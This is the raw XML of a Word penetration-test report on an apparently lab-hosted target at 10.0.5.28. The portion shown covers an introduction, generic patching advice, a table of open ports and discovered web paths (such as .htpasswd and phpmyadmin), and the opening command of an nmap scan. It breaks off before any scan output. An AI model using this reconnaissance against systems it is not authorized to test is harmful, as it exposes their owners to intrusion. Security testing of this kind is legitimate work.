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31CFE" w14:textId="31DB4C91" w:rsidR="007D5B53" w:rsidRDefault="007D5B53" w:rsidP="00FB5FBB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="492734F9" wp14:editId="70A2D53C">
            <wp:extent cx="5935980" cy="5181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F95FD" w14:textId="77777777" w:rsidR="007D5B53" w:rsidRDefault="007D5B53" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="45974B15" w14:textId="72731E49" w:rsidR="000F358C" w:rsidRPr="00BF382D" w:rsidRDefault="00FF276C" w:rsidP="00BF382D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>NANCURINIR</w:t>
      </w:r>
      <w:r w:rsidR="007D5B53" w:rsidRPr="00BF382D">
        <w:rPr>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F789829" w14:textId="3F030F1B" w:rsidR="007D5B53" w:rsidRDefault="007D5B53" w:rsidP="00BF382D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="007D5B53">
        <w:t>Author: Oliver Mustoe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096B334F" w14:textId="59B1C075" w:rsidR="007D5B53" w:rsidRDefault="00715EBF" w:rsidP="00FB5FBB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="425E6080" wp14:editId="76BCE52A">
            <wp:extent cx="5943600" cy="37109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1251E" w14:textId="4F41A80A" w:rsidR="00715EBF" w:rsidRPr="00BF382D" w:rsidRDefault="00715EBF" w:rsidP="00BF382D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF382D">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">(Image credit: </w:t>
      </w:r>
      <w:r w:rsidR="00FB5FBB" w:rsidRPr="00BF382D">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>https://collider.com/lord-of-the-rings-timeline-explained/</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF382D">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D182ADC" w14:textId="1330FFFC" w:rsidR="007D5B53" w:rsidRDefault="007D5B53" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="59D913A7" w14:textId="77D3D4D7" w:rsidR="007D5B53" w:rsidRDefault="007D5B53" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="149940E2" w14:textId="565ACC7B" w:rsidR="007D5B53" w:rsidRDefault="007D5B53" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="7463753B" w14:textId="26953D84" w:rsidR="007D5B53" w:rsidRDefault="007D5B53" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="4665A5C7" w14:textId="44959F4E" w:rsidR="007D5B53" w:rsidRDefault="007D5B53" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="425D8D5C" w14:textId="24D86140" w:rsidR="007D5B53" w:rsidRDefault="007D5B53" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="1C179105" w14:textId="66D57E72" w:rsidR="00FB5FBB" w:rsidRDefault="00FB5FBB" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="2760C630" w14:textId="77777777" w:rsidR="00FB5FBB" w:rsidRDefault="00FB5FBB" w:rsidP="00FB5FBB"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="-1620900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2F0C4F" w14:textId="04FD0EC2" w:rsidR="00715EBF" w:rsidRPr="00FB5FBB" w:rsidRDefault="00715EBF" w:rsidP="00BF382D">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:rStyle w:val="Heading1Char"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00FB5FBB">
            <w:rPr>
              <w:rStyle w:val="Heading1Char"/>
            </w:rPr>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1F9D3A0D" w14:textId="29CCB853" w:rsidR="00900CFB" w:rsidRDefault="00715E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715EBF">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00715EBF">
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00715EBF">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc119770783" w:history="1">
            <w:r w:rsidR="00900CFB" w:rsidRPr="00D82E9C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Introduction:</w:t>
            </w:r>
            <w:r w:rsidR="00900CFB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00900CFB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00900CFB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc119770783 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00900CFB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00900CFB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00DD29EB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00900CFB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6DC8CE86" w14:textId="71FDBCBE" w:rsidR="00900CFB" w:rsidRDefault="00900CF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9770784" w:history="1">
            <w:r w:rsidRPr="00D82E9C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>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9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7E7A9" w14:textId="3A0FA929" w:rsidR="00900CFB" w:rsidRDefault="00900CF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9770785" w:history="1">
            <w:r w:rsidRPr="00D82E9C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommend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9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F1757" w14:textId="7C953A57" w:rsidR="00900CFB" w:rsidRDefault="00900CF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9770786" w:history="1">
            <w:r w:rsidRPr="00D82E9C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>System IP: 10.0.5.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9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F0905" w14:textId="142483AD" w:rsidR="00900CFB" w:rsidRDefault="00900C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9770787" w:history="1">
            <w:r w:rsidRPr="00D82E9C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Service enum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9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9E94C" w14:textId="3731D217" w:rsidR="00900CFB" w:rsidRDefault="00900C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9770788" w:history="1">
            <w:r w:rsidRPr="00D82E9C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Privilege esca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9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800DA" w14:textId="5427D257" w:rsidR="00715EBF" w:rsidRPr="00715EBF" w:rsidRDefault="00715EBF" w:rsidP="00FB5FBB">
          <w:r w:rsidRPr="00715EBF">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="47EA435B" w14:textId="1BD81FCB" w:rsidR="007D5B53" w:rsidRDefault="007D5B53" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="4D4868D1" w14:textId="288A40A2" w:rsidR="00715EBF" w:rsidRDefault="00715EBF" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="5ADE5693" w14:textId="1EAC296F" w:rsidR="00715EBF" w:rsidRDefault="00715EBF" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="4DBE4D9B" w14:textId="18B41BB0" w:rsidR="00715EBF" w:rsidRDefault="00715EBF" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="5096E363" w14:textId="479E2C80" w:rsidR="00715EBF" w:rsidRDefault="00715EBF" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="1A1DF4AF" w14:textId="0A408A4F" w:rsidR="00715EBF" w:rsidRDefault="00715EBF" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="6906BD08" w14:textId="428ECEEC" w:rsidR="00715EBF" w:rsidRDefault="00715EBF" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="7BA5069A" w14:textId="04FB3E1B" w:rsidR="00715EBF" w:rsidRDefault="00715EBF" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="358A4489" w14:textId="1474147D" w:rsidR="00715EBF" w:rsidRDefault="00715EBF" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="4442B549" w14:textId="4E317BFF" w:rsidR="00715EBF" w:rsidRDefault="00715EBF" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="5B6ED49B" w14:textId="45DF1886" w:rsidR="00715EBF" w:rsidRDefault="00715EBF" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="7B44B952" w14:textId="76BE7B46" w:rsidR="00715EBF" w:rsidRDefault="00715EBF" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="048C3015" w14:textId="111D4EA7" w:rsidR="00715EBF" w:rsidRDefault="00715EBF" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="2C5F18E9" w14:textId="574B7DFB" w:rsidR="00715EBF" w:rsidRDefault="00715EBF" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="062CF023" w14:textId="05051C0D" w:rsidR="00715EBF" w:rsidRDefault="00715EBF" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="3011CE14" w14:textId="361BA750" w:rsidR="00715EBF" w:rsidRDefault="00715EBF" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="5DEE7DEE" w14:textId="2161F372" w:rsidR="00715EBF" w:rsidRDefault="00715EBF" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="45C52A0A" w14:textId="37EAA25E" w:rsidR="00715EBF" w:rsidRDefault="00715EBF" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="3F63B6BB" w14:textId="6F6601D1" w:rsidR="00715EBF" w:rsidRDefault="00715EBF" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="37609F9E" w14:textId="10D8516F" w:rsidR="00715EBF" w:rsidRDefault="00715EBF" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="55B8CB6A" w14:textId="2D609546" w:rsidR="00715EBF" w:rsidRDefault="00715EBF" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="29232525" w14:textId="77777777" w:rsidR="00FB5FBB" w:rsidRDefault="00FB5FBB" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="63AAA660" w14:textId="69597256" w:rsidR="00715EBF" w:rsidRPr="009E3684" w:rsidRDefault="00715EBF" w:rsidP="009E3684">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc119770783"/>
      <w:r w:rsidRPr="009E3684">
        <w:rPr>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Introduction:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="5BDC69D9" w14:textId="03B7A2AA" w:rsidR="00715EBF" w:rsidRDefault="00715EBF" w:rsidP="00FB5FBB">
      <w:r>
        <w:t xml:space="preserve">This report contains all actions conducted to test the provided target/s, with the purpose </w:t>
      </w:r>
      <w:r w:rsidR="00FB5FBB">
        <w:t>of ensuring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the vulnerable machine</w:t>
      </w:r>
      <w:r w:rsidR="008F1AE7">
        <w:t>/s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> would be ready to be deployed in a production environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355B3CA1" w14:textId="0831C044" w:rsidR="00715EBF" w:rsidRDefault="00715EBF" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="77A997AA" w14:textId="278430AD" w:rsidR="00715EBF" w:rsidRDefault="00715EBF" w:rsidP="00BF382D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc119770784"/>
      <w:r>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB5FBB">
        <w:t>bjecti</w:t>
      </w:r>
      <w:r>
        <w:t>ve:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="154C11C0" w14:textId="32C59CAD" w:rsidR="00715EBF" w:rsidRDefault="00715EBF" w:rsidP="00FB5FBB">
      <w:r>
        <w:t xml:space="preserve">The objective of this report is to conduct a penetration test against the provided </w:t>
      </w:r>
      <w:r w:rsidR="00FB5FBB">
        <w:t>targets</w:t>
      </w:r>
      <w:r>
        <w:t>. The penetration tester is tasked with following an orderly approach in penetrating the target to achieve objective goals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A98128" w14:textId="75CC9812" w:rsidR="00715EBF" w:rsidRDefault="00715EBF" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="44F2E1C0" w14:textId="5F19C689" w:rsidR="00715EBF" w:rsidRDefault="00715EBF" w:rsidP="00BF382D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc119770785"/>
      <w:r>
        <w:t>Recommendations:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="7AE251DA" w14:textId="7C033624" w:rsidR="00715EBF" w:rsidRDefault="00715EBF" w:rsidP="00FB5FBB">
      <w:r w:rsidRPr="00FB5FBB">
        <w:t>The p</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">enetration tester recommends patching all possible vulnerabilities identified during this test </w:t>
      </w:r>
      <w:r w:rsidR="008F1AE7">
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ensure that </w:t>
      </w:r>
      <w:r w:rsidR="00FF276C">
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> attacker could not exploit them in the future. The patching process should be implemented as a regular patching program </w:t>
      </w:r>
      <w:r w:rsidR="00FB5FBB">
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> protect against other vulnerabilities found </w:t>
      </w:r>
      <w:r w:rsidR="00FB5FBB">
        <w:t>later</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16793BBF" w14:textId="43F5DD49" w:rsidR="00FB5FBB" w:rsidRDefault="00FB5FBB" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="4A371DA0" w14:textId="3F785060" w:rsidR="00FB5FBB" w:rsidRDefault="00FB5FBB" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="05B05722" w14:textId="590B682D" w:rsidR="00FB5FBB" w:rsidRDefault="00FB5FBB" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="25A8625D" w14:textId="47D23F5C" w:rsidR="00FB5FBB" w:rsidRDefault="00FB5FBB" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="67D58163" w14:textId="04D1B26C" w:rsidR="00FB5FBB" w:rsidRDefault="00FB5FBB" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="7BB68B95" w14:textId="2515D5BB" w:rsidR="00FB5FBB" w:rsidRDefault="00FB5FBB" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="51B5317D" w14:textId="2F3857FC" w:rsidR="00FB5FBB" w:rsidRDefault="00FB5FBB" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="1F9434A4" w14:textId="13B4461B" w:rsidR="00FB5FBB" w:rsidRDefault="00FB5FBB" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="05F23B13" w14:textId="38D10365" w:rsidR="00FB5FBB" w:rsidRDefault="00FB5FBB" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="457C1C12" w14:textId="454DCB56" w:rsidR="00FB5FBB" w:rsidRDefault="00FB5FBB" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="547E7231" w14:textId="11EF9460" w:rsidR="00FB5FBB" w:rsidRDefault="00FB5FBB" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="2F1BE0CC" w14:textId="5B8BB53E" w:rsidR="00FB5FBB" w:rsidRDefault="00FB5FBB" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="19B50223" w14:textId="501FC0CC" w:rsidR="00FB5FBB" w:rsidRDefault="00FB5FBB" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="6D3421E8" w14:textId="0405AC48" w:rsidR="00FB5FBB" w:rsidRDefault="00FB5FBB" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="68AF0851" w14:textId="1DDEF42E" w:rsidR="00FB5FBB" w:rsidRDefault="00FB5FBB" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="0D4A39A4" w14:textId="73921381" w:rsidR="00FB5FBB" w:rsidRDefault="00FB5FBB" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="46032E47" w14:textId="031341B9" w:rsidR="00FB5FBB" w:rsidRDefault="00FB5FBB" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="480CD3C2" w14:textId="3ADB3633" w:rsidR="00FB5FBB" w:rsidRPr="00BF382D" w:rsidRDefault="00FB5FBB" w:rsidP="00BF382D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc119770786"/>
      <w:r w:rsidRPr="00BF382D">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">System IP: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF382D">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>10.0.5.</w:t>
      </w:r>
      <w:r w:rsidR="00FF276C">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="6FA90C44" w14:textId="43488869" w:rsidR="00FB5FBB" w:rsidRDefault="00FB5FBB" w:rsidP="00FB5FBB"/>
    <w:p w14:paraId="50A5F9C9" w14:textId="47D501CD" w:rsidR="00FB5FBB" w:rsidRPr="00BF382D" w:rsidRDefault="00FB5FBB" w:rsidP="00BF382D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc119770787"/>
      <w:r w:rsidRPr="00BF382D">
        <w:t>Service enumeration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="51B2DEC0" w14:textId="286B6F55" w:rsidR="00FB5FBB" w:rsidRPr="00FB5FBB" w:rsidRDefault="00FB5FBB" w:rsidP="00FB5FBB">
      <w:r>
        <w:tab/>
      </w:r>
      <w:bookmarkStart w:id="5" w:name="_Hlk119763726"/>
      <w:r>
        <w:t xml:space="preserve">Service </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF382D">
        <w:t xml:space="preserve">enumeration </w:t>
      </w:r>
      <w:r>
        <w:t>is the process in which methods are used to find service</w:t>
      </w:r>
      <w:r w:rsidR="00FF276C">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> available on</w:t>
      </w:r>
      <w:r w:rsidR="00FF276C">
        <w:t xml:space="preserve"> the target</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FF276C">
        <w:t xml:space="preserve"> By completing this part of the penetration test, the attacker can understand what applications are running on </w:t>
      </w:r>
      <w:r w:rsidR="00814189">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="00FF276C">
        <w:t xml:space="preserve"> system for exploitation. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="04896EB3" w14:textId="415BEEAD" w:rsidR="00FB5FBB" w:rsidRDefault="00FB5FBB" w:rsidP="00BF382D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9"/>
        <w:gridCol w:w="3144"/>
        <w:gridCol w:w="2957"/>
      </w:tblGrid>
      <w:tr w:rsidR="00814189" w14:paraId="3590953C" w14:textId="0F1C6D98" w:rsidTr="00814189">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3249" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7342B87D" w14:textId="5024778A" w:rsidR="00814189" w:rsidRDefault="00814189" w:rsidP="00BF382D">
            <w:r>
              <w:t>Server IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3144" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61AC99AE" w14:textId="4F33176B" w:rsidR="00814189" w:rsidRDefault="00814189" w:rsidP="00BF382D">
            <w:r>
              <w:t>Open Ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2957" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50A51CAF" w14:textId="5EE5E65B" w:rsidR="00814189" w:rsidRDefault="00814189" w:rsidP="00BF382D">
            <w:r>
              <w:t>Found Directories</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00814189" w14:paraId="60A121C3" w14:textId="694A55D1" w:rsidTr="00814189">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3249" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06B9DD4A" w14:textId="337C970C" w:rsidR="00814189" w:rsidRDefault="00814189" w:rsidP="00BF382D">
            <w:r w:rsidRPr="00BF382D">
              <w:t>10.0.5.</w:t>
            </w:r>
            <w:r>
              <w:t>28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3144" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="236B2618" w14:textId="60C9D3CD" w:rsidR="00814189" w:rsidRDefault="00814189" w:rsidP="00BF382D">
            <w:r>
              <w:t>TCP: 80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2957" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CE2D217" w14:textId="77777777" w:rsidR="00814189" w:rsidRDefault="00814189" w:rsidP="00814189">
            <w:r>
              <w:t xml:space="preserve">http://10.0.5.28/.htaccess            </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64A2A421" w14:textId="77777777" w:rsidR="00814189" w:rsidRDefault="00814189" w:rsidP="00814189">
            <w:r>
              <w:t xml:space="preserve">http://10.0.5.28/.hta                 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E7F75C8" w14:textId="77777777" w:rsidR="00814189" w:rsidRDefault="00814189" w:rsidP="00814189">
            <w:r>
              <w:t xml:space="preserve">http://10.0.5.28/.htpasswd            </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AD653CC" w14:textId="77777777" w:rsidR="00814189" w:rsidRDefault="00814189" w:rsidP="00814189">
            <w:r>
              <w:t xml:space="preserve">http://10.0.5.28/index.html           </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B59804A" w14:textId="77777777" w:rsidR="00814189" w:rsidRDefault="00814189" w:rsidP="00814189">
            <w:r>
              <w:t xml:space="preserve">http://10.0.5.28/phpmyadmin           </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63CB1082" w14:textId="139B8628" w:rsidR="00814189" w:rsidRDefault="00814189" w:rsidP="00814189">
            <w:r>
              <w:t xml:space="preserve">http://10.0.5.28/server-status        </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7EE02BC0" w14:textId="78FB5AD5" w:rsidR="00BF382D" w:rsidRDefault="00BF382D" w:rsidP="00BF382D"/>
    <w:p w14:paraId="5DD8A7C5" w14:textId="5A583BDB" w:rsidR="00BF382D" w:rsidRDefault="00FF276C" w:rsidP="00BF382D">
      <w:r>
        <w:t>NMAP scan result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099496BE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>┌──(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF276C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>champuser</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF276C">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF276C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF276C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FF276C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FF276C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF276C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2467BCB5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 xml:space="preserve">└─$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF276C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF276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FF276C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF276C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.5.28 -A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABF42BF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 xml:space="preserve">Starting Nmap 7.93 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
